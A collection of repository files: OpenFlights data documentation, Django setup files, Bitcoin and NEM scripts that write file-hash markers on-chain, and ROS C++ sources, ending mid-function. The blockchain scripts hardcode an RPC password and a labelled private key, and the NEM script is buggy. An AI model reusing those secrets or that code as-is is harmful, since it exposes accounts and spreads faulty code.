click on the PayPal link to the right (Visa, MasterCard, American Express and Discover also accepted). We suggest **US$50**, but any amount at all is welcome, and you may use the data for free if you feel that you are unable to pay. If you do donate, please specify in the comments if you would like a itemized receipt for business expense or tax purposes. \t\t\t\n\n\nThe GitHub copy is only a sporadically updated static snapshot of the live OpenFlights database (see [revision log](https://github.com/jpatokal/openflights/commits/master/data/airports.dat)). If you would like an up-to-the-minute copy, or you would like your data filtered by any information available to us (eg. number of routes at the airport), do not hesitate to [contact us](https://openflights.org/about.html).\n\nIf you'd like an even more thorough database, with extensive coverage of airstrips, heliports and other places of less interest for commercial airline frequent flyers, do check out [OurAirports](http://ourairports.com/), whose public domain database covers over 40,000 places to fly from.\n\n## Airline database\n\nAs of January 2012, the OpenFlights Airlines Database contains **5888** airlines. Each entry contains the following information:\n\n| Airline ID | Unique OpenFlights identifier for this airline. |\n| ---------- | ------------------------------------------------------------ |\n| Name | Name of the airline. |\n| Alias | Alias of the airline. For example, All Nippon Airways is commonly known as \"ANA\". |\n| IATA | 2-letter IATA code, if available. |\n| ICAO | 3-letter ICAO code, if available. |\n| Callsign | Airline callsign. |\n| Country | Country or territory where airline is incorporated. |\n| Active | \"Y\" if the airline is or has until recently been operational, \"N\" if it is defunct. This field is *not* reliable: in particular, major airlines that stopped flying long ago, but have not had their IATA code reassigned (eg. Ansett/AN), will incorrectly show as \"Y\". |\n\nThe data is ISO 8859-1 (Latin-1) encoded. The special value **\\N** is used for \"NULL\" to indicate that no value is available, and is understood automatically by MySQL if imported.\n\n*Notes*: Airlines with null codes/callsigns/countries generally represent user-added airlines. Since the data is intended primarily for current flights, defunct IATA codes are generally not included. 
For example, \"Sabena\" is not listed with a SN IATA code, since \"SN\" is presently used by its successor Brussels Airlines.\n\n#### Sample entries\n\n```\n324,\"All Nippon Airways\",\"ANA All Nippon Airways\",\"NH\",\"ANA\",\"ALL NIPPON\",\"Japan\",\"Y\"\n412,\"Aerolineas Argentinas\",\\N,\"AR\",\"ARG\",\"ARGENTINA\",\"Argentina\",\"Y\"\n413,\"Arrowhead Airways\",\\N,\"\",\"ARH\",\"ARROWHEAD\",\"United States\",\"N\"\n```\n\nTry it out: [Airline Search](https://openflights.org/html/alsearch) (new window)\n\n*Note*: The Airline Search window above is a part of [OpenFlights](http://openflights.org/). You will not be able to view, add or edit airline details unless you are logged in.\n\n#### Download\n\nTo download the current data dump from [GitHub](https://github.com/jpatokal/openflights/) as a very straightforward CSV (comma-separated value) file, suitable for use in spreadsheets etc, simply click below:\n\nDownload: [airlines.dat](https://raw.githubusercontent.com/jpatokal/openflights/master/data/airlines.dat) (~400 KB)\n\nCreating and maintaining this database has required and continues to require an *immense amount* of work. We need your support to keep this database up-to-date: just click on the PayPal link to the right (Visa, MasterCard, American Express and Discover also accepted). We suggest **US$50**, but any amount at all is welcome, and you may use the data for free if you feel that you are unable to pay. If you do donate, please specify in the comments if you would like a itemized receipt for business expense or tax purposes.\n\nThe GitHub copy is only a sporadically updated static snapshot of the live OpenFlights database (see [revision log](https://github.com/jpatokal/openflights/commits/master/data/airlines.dat)). If you would like an up-to-the-minute copy, or you would like your data filtered by any information available to us (eg. number of flights by airline), do not hesitate to [contact us](https://openflights.org/about.html).\n\n## Route database\n\n[](https://openflights.org/demo/openflights-routedb-2048.png)\n(click to enlarge)\n\nWarning: The third-party that OpenFlights uses for route data ceased providing updates in June 2014. The current data is of historical value only.\n\nAs of June 2014, the OpenFlights/Airline Route Mapper Route Database contains **67663** routes between **3321** airports on **548** airlines spanning the globe, as shown in the map above. Each entry contains the following information:\n\n| Airline | 2-letter (IATA) or 3-letter (ICAO) code of the airline. |\n| ---------------------- | ------------------------------------------------------------ |\n| Airline ID | Unique OpenFlights identifier for airline (see [Airline](https://openflights.org/data.html#airline)). |\n| Source airport | 3-letter (IATA) or 4-letter (ICAO) code of the source airport. |\n| Source airport ID | Unique OpenFlights identifier for source airport (see [Airport](https://openflights.org/data.html#airport)) |\n| Destination airport | 3-letter (IATA) or 4-letter (ICAO) code of the destination airport. |\n| Destination airport ID | Unique OpenFlights identifier for destination airport (see [Airport](https://openflights.org/data.html#airport)) |\n| Codeshare | \"Y\" if this flight is a codeshare (that is, not operated by *Airline*, but another carrier), empty otherwise. |\n| Stops | Number of stops on this flight (\"0\" for direct) |\n| Equipment | 3-letter codes for plane type(s) generally used on this flight, separated by spaces |\n\nThe data is ISO 8859-1 (Latin-1) encoded. 
The special value **\\N** is used for \"NULL\" to indicate that no value is available, and is understood automatically by MySQL if imported.\n\nNotes:\n\n- Routes are directional: if an airline operates services from A to B and from B to A, both A-B and B-A are listed separately.\n- Routes where one carrier operates both its own and codeshare flights are listed only once.\n\n#### Sample entries\n\n```\nBA,1355,SIN,3316,LHR,507,,0,744 777\nBA,1355,SIN,3316,MEL,3339,Y,0,744\nTOM,5013,ACE,1055,BFS,465,,0,320\n```\n\nRoute maps for airports and airlines can be viewed by [searching for their names or code in the website's Search box](http://openflights.org/blog/2009/07/15/airline-route-maps-launched-metric-distances-available/); alternatively, check out the [alphabetical list of all covered airports and airlines](https://openflights.org/html/route-maps).\n\n#### Download\n\nTo download the current data dump from [GitHub](https://github.com/jpatokal/openflights) as a comma-delimited file, suitable for use in spreadsheets etc., simply click below:\n\nDownload: [routes.dat](https://raw.githubusercontent.com/jpatokal/openflights/master/data/routes.dat) (~2 MB)\n\nCreating and maintaining this database has required and continues to require an *immense amount* of work. We need your support to keep this database up-to-date: just click on the PayPal link to the right (Visa, MasterCard, American Express and Discover also accepted). We suggest **US$50**, but any amount at all is welcome, and you may use the data for free if you feel that you are unable to pay. If you do donate, please specify in the comments if you would like an itemized receipt for business expense or tax purposes.\n\nThe GitHub copy is only a sporadically updated static snapshot of the live OpenFlights database (see [revision log](https://github.com/jpatokal/openflights/commits/master/data/routes.dat)). If you would like an up-to-the-minute copy, or you would like your data filtered by any information available to us (eg. number of routes by airline), do not hesitate to [contact us](https://openflights.org/about.html).\n\n## Plane database\n\nThe OpenFlights plane database contains a curated selection of **173** passenger aircraft with IATA and/or ICAO codes, covering the vast majority of flights operated today and commonly used in flight schedules and reservation systems. Each entry contains the following information:\n\n| Name | Full name of the aircraft. |\n| --------- | ----------------------------------------------------- |\n| IATA code | Unique three-letter IATA identifier for the aircraft. |\n| ICAO code | Unique four-letter ICAO identifier for the aircraft. |\n\nThe data is UTF-8 encoded. The special value **\\\N** is used for \"NULL\" to indicate that no value is available, and is understood automatically by MySQL if imported.\n\nNotes:\n\n- Aircraft with IATA but without ICAO codes are generally aircraft classes: for example, IATA \"747\" can be any type of Boeing 747, whereas IATA \"744\"/ICAO \"B744\" is specifically a Boeing 747-400.\n\n#### Sample entries\n\n```\n\"Boeing 787\",\"787\",\\N\n\"Boeing 787-10\",\"78J\",\"B78X\"\n\"Boeing 787-8\",\"788\",\"B788\"\n```\n\n#### Download\n\nTo download the current data dump from [GitHub](https://github.com/jpatokal/openflights) as a comma-delimited file, suitable for use in spreadsheets etc., simply click below:\n\nDownload: [planes.dat](https://raw.githubusercontent.com/jpatokal/openflights/master/data/planes.dat) (~5 KB)"
}
] | 12 |
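The airline-database documentation embedded in the record above specifies a fixed column order, ISO 8859-1 (Latin-1) encoding, and a literal `\N` sentinel for missing values. A minimal parsing sketch in Python follows; the `airlines.dat` filename, encoding, and column order come from that documentation, while the snake_case field names and the helper name are illustrative choices:

```python
import csv

# Column order as documented for airlines.dat in the record above;
# the identifiers themselves are chosen for illustration.
FIELDS = ["airline_id", "name", "alias", "iata", "icao",
          "callsign", "country", "active"]

def load_airlines(path="airlines.dat"):
    """Parse the dump, mapping the literal \\N sentinel to None."""
    rows = []
    # The dump is documented as ISO 8859-1 (Latin-1) encoded.
    with open(path, newline="", encoding="latin-1") as f:
        for record in csv.reader(f):
            rows.append({name: (None if value == "\\N" else value)
                         for name, value in zip(FIELDS, record)})
    return rows

if __name__ == "__main__":
    airlines = load_airlines()
    active = [a for a in airlines if a["active"] == "Y"]
    print(f"{len(airlines)} airlines, {len(active)} flagged active")
```

The same pattern carries over to `airports.dat`, `routes.dat`, and `planes.dat` with their own field lists; note that only `planes.dat` is documented as UTF-8 rather than Latin-1.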
ataulmaola/blog_any
|
https://github.com/ataulmaola/blog_any
|
cdd1acdd59ac70b636d48c0f13100bb6634e281b
|
8b704b38beb433b889ab643a02b19dad15a862ca
|
bae47626166131fd34f10519479b1621981d186a
|
refs/heads/master
| 2023-01-11T05:27:26.564345 | 2017-05-01T01:05:31 | 2017-05-01T01:05:31 | 89,884,557 | 0 | 0 | null | 2017-04-30T23:59:06 | 2017-05-01T00:20:19 | 2022-12-26T20:00:11 |
JavaScript
|
[
{
"alpha_fraction": 0.5148902535438538,
"alphanum_fraction": 0.7178683280944824,
"avg_line_length": 17.764705657958984,
"blob_id": "9da772c03c21d81b1042bd400de16fe885af9753",
"content_id": "20535b9166da95f3874f10172dde2fa5ddf267fa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 1276,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 68,
"path": "/requirements.txt",
"repo_name": "ataulmaola/blog_any",
"src_encoding": "UTF-8",
"text": "Django==1.10.6\nPAM==0.4.2\nPillow==2.3.0\nPmw==1.3.2\nPyDispatcher==2.0.5\nPyOpenGL==3.0.2\nPygments==2.2.0\nScrapy==1.3.3\nTwisted-Core==13.2.0\nTwisted-Web==13.2.0\nadium-theme-ubuntu==0.3.4\napt-xapian-index==0.45\nargparse==1.2.1\nchardet==2.0.1\ncolorama==0.2.5\ncommand-not-found==0.3\ncssselect==1.0.1\ndebtagshw==0.1\ndefer==1.0.6\ndirspec==13.10\ndj-database-url==0.4.2\ndjango-bootstrap3==8.2.2\ndocutils==0.13.1\nduplicity==0.6.23\ngunicorn==19.7.1\nhtml5lib==0.999\nhttplib2==0.8\nlockfile==0.8\nlxml==3.3.3\nnumpy==1.8.2\noauthlib==0.6.1\noneconf==0.3.7.14.04.1\nparsel==1.1.0\npexpect==3.1\npick-colour-picker==1.0\npiston-mini-client==0.7.5\npowerline-status==2.5.2.dev9999-git.5fa504118ee470e9cc9c8665515b77900ce5821e\npyOpenSSL==0.13\npycrypto==2.6.1\npycups==1.9.66\npycurl==7.19.3\npyenchant==1.6.5\npygame==1.9.1release\npygobject==3.12.0\npyserial==2.6\npysheng==0.1\npysmbc==1.0.14.1\npython-apt==0.9.3.5ubuntu2\npython-debian==0.1.21-nmu2ubuntu2\npyxdg==0.25\nqueuelib==1.4.2\nreportlab==3.0\nrequests==2.2.1\nservice-identity==16.0.0\nsessioninstaller==0.0.0\nsix==1.5.2\nsoftware-center-aptd-plugins==0.0.0\nswampy==2.1.7\nsystem-service==0.1.6\nunity-lens-photos==1.0\nurllib3==1.7.1\nvirtualenv==15.1.0\nw3lib==1.17.0\nwheel==0.24.0\nwhitenoise==3.3.0\nwsgiref==0.1.2\nxdiagnose==3.6.3build2\nzope.interface==4.0.5\n"
},
{
"alpha_fraction": 0.8166189193725586,
"alphanum_fraction": 0.8166189193725586,
"avg_line_length": 22.33333396911621,
"blob_id": "9ae19c312763a97942b6a38b4cdb54f606636651",
"content_id": "d437696c22e84c115363171507686c5ba515f366",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 349,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 15,
"path": "/sample_wsgi.py",
"repo_name": "ataulmaola/blog_any",
"src_encoding": "UTF-8",
"text": "import os\nimport sys\n\npath='/home/pythonanyusername/projectname'\n\nif path not in sys.path:\n\tsys.path.append(path)\n\nos.environ['DJANGO_SETTINGS_MODULE']='projectname.settings'\n\nfrom django.core.wsgi import get_wsgi_application\n\nfrom django.contrib.staticfiles.handlers import StaticFilesHandler\n\napplication=StaticFilesHandler(get_wsgi_application())"
}
] | 2 |
wlyuen2000/devsample
|
https://github.com/wlyuen2000/devsample
|
244feef67a25acb1fe7aabc1562482e9d483b3bb
|
2ae05b5e4ef0b7e5f2afc4f749f3273337915206
|
51a9edbc79e584e0b772cd59aaa45085bd76086c
|
refs/heads/master
| 2020-04-10T01:01:36.364813 | 2018-03-07T16:46:16 | 2018-03-07T16:46:16 | 124,252,212 | 0 | 0 | null | 2018-03-07T15:02:00 | 2018-03-07T15:38:13 | 2018-03-07T15:45:18 |
Python
|
[
{
"alpha_fraction": 0.8333333134651184,
"alphanum_fraction": 0.8333333134651184,
"avg_line_length": 23,
"blob_id": "78b3b324daa0f6f0c7142f725e897f5f04e5ba5f",
"content_id": "559cb02a5eb1583aee8b268bf8f816754caa684d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 24,
"license_type": "no_license",
"max_line_length": 23,
"num_lines": 1,
"path": "/readme.md",
"repo_name": "wlyuen2000/devsample",
"src_encoding": "UTF-8",
"text": "Program to practice git\n"
},
{
"alpha_fraction": 0.75,
"alphanum_fraction": 0.75,
"avg_line_length": 12,
"blob_id": "cbdbf7601cc40190a1c27f25c8d7f4a5a749b88b",
"content_id": "6038f5acdf1d71d29d8ebe56fa04db0dc9dae979",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 52,
"license_type": "no_license",
"max_line_length": 25,
"num_lines": 4,
"path": "/src/mysrc.py",
"repo_name": "wlyuen2000/devsample",
"src_encoding": "UTF-8",
"text": "this is a src in master\n\n\nThis is rebase merge test\n"
}
] | 2 |
tom0927fuj/testnem
|
https://github.com/tom0927fuj/testnem
|
471e5b0c2ec0404c8e727c223187215dcd2b4cd3
|
4c8af132e484f8b834dd59f58da5202dd048d6c0
|
45eddba165460cc555cf08ce66eaf6cc4348772e
|
refs/heads/master
| 2021-05-16T21:00:05.214098 | 2020-04-16T02:55:51 | 2020-04-16T02:55:51 | 250,467,748 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5899471044540405,
"alphanum_fraction": 0.6243386268615723,
"avg_line_length": 32.35293960571289,
"blob_id": "31acf9ffdf046205e48055063deb1cc95f7bf5b8",
"content_id": "3a04c1107708ebf5d889def5c53728a779fb7684",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2300,
"license_type": "no_license",
"max_line_length": 148,
"num_lines": 68,
"path": "/main2.py",
"repo_name": "tom0927fuj/testnem",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom bitcoinrpc.authproxy import AuthServiceProxy, JSONRPCException\nfrom decimal import Decimal, getcontext\nfrom binascii import hexlify\nfrom pprint import pprint\nimport hashlib\nimport json\n\ndef main():\n    rpc_user = 'rpcuser'\n    rpc_password = 'Cq@q7K&pYX3e4eCM!7'\n    rpc = AuthServiceProxy(f'http://{rpc_user}:{rpc_password}@127.0.0.1:18332/')\n    #rpc = AuthServiceProxy(f'http://{rpc_user}:{rpc_password}@172.17.0.2:18332/')\n    print(rpc.getinfo())\n    best_block_hash = rpc.getbestblockhash()\n    print(rpc.getblock(best_block_hash))\n    blhash = rpc.getblockhash(0) #blhash is the hash string of the block\n    bl = rpc.getblock(blhash) #bl is the block info\n    print(bl)\n    dummy_address = '2MudgRfNaaw96kqAWziZ5JGsPbo2pzQp7Jy'\n    change_address = '2NAVrak22jX3DQyDqnoqdm5ZTak1RgXWPzo'\n\n    filename = 'mark_token.btc.json'\n    url='https://drive.google.com/file/d/1ZR6Q5sCM_acUpPy7s3d9GJH8I2Plh4FI/view?usp=sharing'\n\n    with open(filename, 'rb') as f:\n        data2 = f.read()\n    hashdata=hashlib.sha256(data2).hexdigest()\n    js={'file_hash':hashdata,'url':url}\n    data=json.dumps(js).encode(\"UTF-8\")\n\n\n    while True:\n        if len(data) >= 80:\n            buffer = data[:80]\n            data = data[80:]\n        elif len(data) == 0:\n            break\n        else:\n            buffer = data\n            data = b''\n\n        first_unspent = rpc.listunspent()[0]\n        txid = first_unspent['txid']\n        vout = first_unspent['vout']\n        input_amount = first_unspent['amount']\n        SATOSHI = Decimal(\"0.00000001\")\n        change_amount = input_amount - Decimal(\"0.005\") - SATOSHI\n\n        tx = rpc.createrawtransaction([{\"txid\": txid, \"vout\": vout}],[{change_address: change_amount}, {'data': hexlify(buffer).decode('utf-8')}, ])\n        tx = rpc.signrawtransactionwithwallet(tx)['hex']\n        rpc.sendrawtransaction(tx)\n\n    block_hash = rpc.generatetoaddress(1, change_address)[0]\n    block = rpc.getblock(block_hash)\n    txs = block['tx'][1:]\n\n    print(f'# of txs: {len(txs)}')\n    pprint(txs)\n\n    for tx_hash in txs:\n        raw_tx = rpc.gettransaction(tx_hash)['hex']\n        decoded_tx = rpc.decoderawtransaction(raw_tx)\n        # pprint(decoded_tx)\n        print(decoded_tx['vout'][1]['scriptPubKey']['asm'])\n\nif __name__ == '__main__':\n    main()\n"
},
{
"alpha_fraction": 0.5108645558357239,
"alphanum_fraction": 0.5709662437438965,
"avg_line_length": 24.03333282470703,
"blob_id": "1c557b4137527869d5e2b5d8b3e3437ffe03b1c9",
"content_id": "7d0046dab6f80165c34ff9750d297431c6c55ccc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2183,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 90,
"path": "/test.py",
"repo_name": "tom0927fuj/testnem",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nfrom nemnis import Client, explain_status\nimport json\nfrom decimal import Decimal, getcontext\nfrom binascii import hexlify\nfrom pprint import pprint\n\n\n\ndef main():\n    nis = Client()\n    hb = nis.heartbeat()\n\n    senderAddress=\"TCPWWG327BPLTSB62733CWEV3L37INFRZ4A6TKUR\"\n    pubkey=\"2e884d52108390c45511a4f2e3d734769645513e23883646e8f31d99a068f6a5\"\n    prikey=\"5a82f55131b407aa6e295688a16e801cba922b0346a79e23c3348fc84893ff61\"\n\n    status = nis.status()\n    timestamp=nis.call('GET', 'time-sync/network-time').json()['sendTimeStamp']\n    deadline=timestamp + 3600  # assumption: deadline one hour after network time\n    recipient=\"TAJQJIVTOOZNBYSVWDXUEZESPLO6AL456NBBO24L\"\n    version=-1744830463\n    type=257\n\n    filename = 'mark_token.nem.json'\n    with open(filename, 'rb') as f:\n        data = f.read()\n    print(len(data))\n\n    while True:\n        if len(data) >= 1024:\n            buffer = data[:1024]\n            data = data[1024:]\n        elif len(data) == 0:\n            break\n        else:\n            buffer = data\n            data = b''\n    microFee=((int)(len(buffer)/32)+1)*1000000*0.05\n    microAmount=0\n    print(len(buffer))\n    print(microFee)\n    exit()\n    txObj = {'timeStamp': timestamp,\n    'amount': microAmount,\n    'fee': microFee,\n    'recipient': recipient,\n    'type': 257, #transfer transaction\n    'deadline': deadline,\n    'message': {\n    'type': 1, #1: not encrypted, 2: encrypted\n    'payload': hexlify(buffer).decode('utf-8')\n    },\n    'version': version,\n    'signer': pubkey\n    }\n\n    exit()\n    print(status.json())\n\n    # you can use following function to get verbose message for status\n    print(explain_status(status.json()))\n\n    print(hb.status_code)\n\n    print(hb.json())\n\n    acc = nis.account.get('TAJQJIVTOOZNBYSVWDXUEZESPLO6AL456NBBO24L')\n\n    print(acc.status_code)\n\n    print(acc.json())\n\n    acc2 = nis.account.get('TCPWWG327BPLTSB62733CWEV3L37INFRZ4A6TKUR')\n\n    print(acc2.status_code)\n\n    print(acc2.json())\n\n    ### You can connect to other nodes just by passing it address:\n    new_client = Client('http://127.0.0.1:7890')\n\n    new_hb = new_client.heartbeat()\n\n    print(new_hb.status_code)\n\n    print(new_hb.json())\n\n\nif __name__ == '__main__':\n    main()\n"
}
] | 2 |
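Both scripts in the record above follow the same embed-a-file-marker recipe: hash a local file, wrap the digest and a URL in JSON, then split the payload into protocol-sized chunks (80 bytes per Bitcoin OP_RETURN output in `main2.py`, 1024 bytes per NEM message in `test.py`, whose fee is computed as `(len(chunk)//32 + 1) * 0.05` XEM). The chunking can be isolated into a small helper instead of the mutate-in-place `while True` loop; a minimal sketch, where the helper names and the marker URL are illustrative:

```python
import hashlib
import json
from binascii import hexlify

def file_marker(filename: str, url: str) -> bytes:
    """Build the JSON marker the scripts embed: SHA-256 of the file plus a URL."""
    with open(filename, "rb") as f:
        digest = hashlib.sha256(f.read()).hexdigest()
    return json.dumps({"file_hash": digest, "url": url}).encode("utf-8")

def payload_chunks(data: bytes, chunk_size: int):
    """Yield successive chunk_size slices (80 for OP_RETURN, 1024 for NEM)."""
    for offset in range(0, len(data), chunk_size):
        yield data[offset:offset + chunk_size]

if __name__ == "__main__":
    marker = file_marker("mark_token.btc.json", "https://example.invalid/marker")
    for chunk in payload_chunks(marker, 80):
        # Each line is one OP_RETURN-sized hex payload.
        print(hexlify(chunk).decode("utf-8"))
```

Slicing over a `range` keeps the source bytes immutable and makes the chunk boundary (the only protocol-specific parameter) explicit at the call site.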
oussamaabdulhay/davis_corner
|
https://github.com/oussamaabdulhay/davis_corner
|
7d56a3df4936d7f9a0e750a791f68524248ce263
|
785996a431af57e41cc102030418f569d83fd31f
|
f6a27ad403b3402f3c641fc83e8458acbe226347
|
refs/heads/master
| 2023-01-24T01:49:25.486030 | 2020-12-10T07:25:02 | 2020-12-10T07:25:02 | 312,803,314 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6197017431259155,
"alphanum_fraction": 0.6361852288246155,
"avg_line_length": 30.837499618530273,
"blob_id": "d06fd022f962f7b5d111dd9df9b6b7a737e060bf",
"content_id": "9747023043f65648415ff35ad8e2454420ed750d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2548,
"license_type": "no_license",
"max_line_length": 139,
"num_lines": 80,
"path": "/src/rotation_accelerometer.cpp",
"repo_name": "oussamaabdulhay/davis_corner",
"src_encoding": "UTF-8",
"text": "#include \"rotation_accelerometer.hpp\"\nusing namespace std;\n\nrotation_accelerometer::rotation_accelerometer()\n{\n this->_input_port_0 = new InputPort(ports_id::IP_0_IMU, this);\n this->_input_port_1 = new InputPort(ports_id::IP_1_ROLL, this);\n this->_input_port_2 = new InputPort(ports_id::IP_2_PITCH, this);\n this->_input_port_3 = new InputPort(ports_id::IP_3_YAW, this);\n this->_output_port = new OutputPort(ports_id::OP_0_DATA, this);\n _ports = {_input_port_0, _input_port_1,_input_port_2,_input_port_3, _output_port};\n}\n\nrotation_accelerometer::~rotation_accelerometer()\n{\n}\n\n\nvoid rotation_accelerometer::process(DataMsg* t_msg, Port* t_port) {\n Vector3DMsg *provider = (Vector3DMsg *)t_msg;\n if(t_port->getID() == ports_id::IP_0_IMU)\n {\n accelerometer_data.x = provider->data.x;\n accelerometer_data.y = provider->data.y;\n accelerometer_data.z = provider->data.z;\n \n // std::cout<<\"x=\"<<provider->data.x<<\"\\n\";\n // std::cout<<\"y=\"<<provider->data.y<<\"\\n\";\n // std::cout<<\"z=\"<<provider->data.z<<\"\\n\";\n \n }\n else if(t_port->getID() == ports_id::IP_1_ROLL)\n { \n drone_orientation.x =provider->data.x;\n }\n else if(t_port->getID() == ports_id::IP_2_PITCH)\n { \n drone_orientation.y =provider->data.x;\n update_rotation_matrices();\n \n }\n else if(t_port->getID() == ports_id::IP_3_YAW)\n { \n drone_orientation.z =provider->data.x;\n }\n}\n\n\n\nvoid rotation_accelerometer::update_rotation_matrices() \n{\n MatrixXd R_inertia(3, 3);\n\n R_inertia = R_drone_origin.Update(drone_orientation);\n\n R_inertia=R_inertia.inverse();\n\n rotated_unit_vector = Update_accelerometer_vector(R_inertia);\n\n}\n\nVector3D<float> rotation_accelerometer::Update_accelerometer_vector(MatrixXd R_inertia)\n{\n Vector3D<float> t_results;\n t_results.x = accelerometer_data.x * R_inertia(0, 0) + accelerometer_data.y * R_inertia(0, 1) + accelerometer_data.z * R_inertia(0, 2);\n t_results.y = accelerometer_data.x * R_inertia(1, 0) + accelerometer_data.y * R_inertia(1, 1) + accelerometer_data.z * R_inertia(1, 2);\n t_results.z = accelerometer_data.x * R_inertia(2, 0) + accelerometer_data.y * R_inertia(2, 1) + accelerometer_data.z * R_inertia(2, 2);\n\n rotated_acceleration.x=t_results.x;\n rotated_acceleration.y =t_results.y;\n rotated_acceleration.z=t_results.z;\n\n\n\n Vector3DMsg point_msg;\n point_msg.data = rotated_acceleration;\n this->_output_port->receiveMsgData(&point_msg);\n\n return t_results;\n}\n\n"
},
{
"alpha_fraction": 0.7331042289733887,
"alphanum_fraction": 0.736540675163269,
"avg_line_length": 17.7608699798584,
"blob_id": "1eff062ba1ecc23185d56ecd8c4ffc441b5ba9fd",
"content_id": "78179ba78798c6d6a51435915a4063fbcedf5e6d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 873,
"license_type": "no_license",
"max_line_length": 152,
"num_lines": 46,
"path": "/CMakeLists.txt",
"repo_name": "oussamaabdulhay/davis_corner",
"src_encoding": "UTF-8",
"text": "cmake_minimum_required(VERSION 2.8.3)\nproject(davis_corner)\n\n\nfind_package(catkin REQUIRED COMPONENTS\n roscpp\n std_msgs\n cv_bridge\n image_transport\n sensor_msgs\n dvs_msgs\n message_generation\n hear_architecture\n hear_ros_bridge\n\n)\n\nfind_package(OpenCV REQUIRED)\n\n\nadd_message_files(FILES\n Corners.msg\n)\n\ngenerate_messages(\n DEPENDENCIES\n std_msgs\n)\n\n\n\ncatkin_package(\nINCLUDE_DIRS LIBRARIES rosopencv_t CATKIN_DEPENDS hear_ros_bridge cv_bridge image_transport roscpp sensor_msgs CATKIN_DEPENDS message_runtime std_msgs )\n\ninclude_directories(\n ${CMAKE_CURRENT_SOURCE_DIR}/include\n ${catkin_INCLUDE_DIRS}\n)\n\nFILE(GLOB SOURCE_FILES *.hpp *.cpp *.h\n ${CMAKE_CURRENT_SOURCE_DIR}/src/*.cpp\n )\n\nadd_executable(ball_detector_node src/main.cpp ${SOURCE_FILES})\n\ntarget_link_libraries(ball_detector_node ${catkin_LIBRARIES} ${OpenCV_LIBRARIES})\n\n\n\n\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.566292941570282,
"alphanum_fraction": 0.6098949909210205,
"avg_line_length": 33.47239303588867,
"blob_id": "c9edb235facaba6f98ac99a1b760a4d47b2ba430",
"content_id": "0edbdbce38aaf6447b61cfa8b87b3ffda0b90746",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 5619,
"license_type": "no_license",
"max_line_length": 128,
"num_lines": 163,
"path": "/src/rayrotation_events.cpp",
"repo_name": "oussamaabdulhay/davis_corner",
"src_encoding": "UTF-8",
"text": "#include \"rayrotation_events.hpp\"\nusing namespace std;\n\nrayrotation_events::rayrotation_events()\n{\n    U_v.x = 1;\n    U_v.y = 0;\n    U_v.z = 0;\n\n    P_b.x = 0.617673;\n    P_b.y = 0.2373;\n    P_b.z = 1.2239;\n\n    x = false;\n    y = false;\n\n    this->_input_port_0 = new InputPort(ports_id::IP_0_CAMERA, this);\n    this->_input_port_1 = new InputPort(ports_id::IP_1_X_POSITION, this);\n    this->_input_port_2 = new InputPort(ports_id::IP_2_Y_POSITION, this);\n    this->_input_port_3 = new InputPort(ports_id::IP_3_Z_POSITION, this);\n    this->_input_port_4 = new InputPort(ports_id::IP_4_ROLL, this);\n    this->_input_port_5 = new InputPort(ports_id::IP_5_PITCH, this);\n    this->_input_port_6 = new InputPort(ports_id::IP_6_YAW, this);\n    this->_output_port = new OutputPort(ports_id::OP_0_DATA, this);\n    _ports = {_input_port_0, _input_port_1,_input_port_2 ,_input_port_3,_input_port_4,_input_port_5,_input_port_6,_output_port};\n}\n\nrayrotation_events::~rayrotation_events()\n{\n}\n\nvoid rayrotation_events::process(DataMsg* t_msg, Port* t_port) {\n    Vector3DMsg *provider = (Vector3DMsg *)t_msg;\n\n    if(t_port->getID() == ports_id::IP_0_CAMERA)\n    {\n        Vector2DMsg* pixel_location = (Vector2DMsg*) t_msg;\n        ball_location.x=pixel_location->data.x;\n        ball_location.y=pixel_location->data.y;\n        update_camera_angles();\n    }\n    else if(t_port->getID() == ports_id::IP_1_X_POSITION)\n    { \n        drone_position.x = provider->data.x;\n    }\n    else if(t_port->getID() == ports_id::IP_2_Y_POSITION)\n    { \n        drone_position.y = provider->data.x;\n    }\n    else if(t_port->getID() == ports_id::IP_3_Z_POSITION)\n    { \n        drone_position.z = provider->data.z;\n    }\n    else if(t_port->getID() == ports_id::IP_4_ROLL)\n    { \n        drone_orientation.x =provider->data.x;\n    }\n    else if(t_port->getID() == ports_id::IP_5_PITCH)\n    { \n        drone_orientation.y =provider->data.x;\n    }\n    else if(t_port->getID() == ports_id::IP_6_YAW)\n    { \n        drone_orientation.z =provider->data.x;\n    }\n}\n\nMatrixXd rayrotation_events::MultiplyMatrices(MatrixXd R_inertia, MatrixXd R_drone)\n{\n\n    MatrixXd rotated_matrix(3, 3);\n    rotated_matrix(0, 0) = R_drone(0, 0) * R_inertia(0, 0) + R_drone(0, 1) * R_inertia(1, 0) + R_drone(0, 2) * R_inertia(2, 0);\n\n    rotated_matrix(1, 0) = R_drone(1, 0) * R_inertia(0, 0) + R_drone(1, 1) * R_inertia(1, 0) + R_drone(1, 2) * R_inertia(2, 0);\n\n    rotated_matrix(2, 0) = R_drone(2, 0) * R_inertia(0, 0) + R_drone(2, 1) * R_inertia(1, 0) + R_drone(2, 2) * R_inertia(2, 0);\n\n    rotated_matrix(0, 1) = R_drone(0, 0) * R_inertia(0, 1) + R_drone(0, 1) * R_inertia(1, 1) + R_drone(0, 2) * R_inertia(2, 1);\n\n    rotated_matrix(1, 1) = R_drone(1, 0) * R_inertia(0, 1) + R_drone(1, 1) * R_inertia(1, 1) + R_drone(1, 2) * R_inertia(2, 1);\n\n    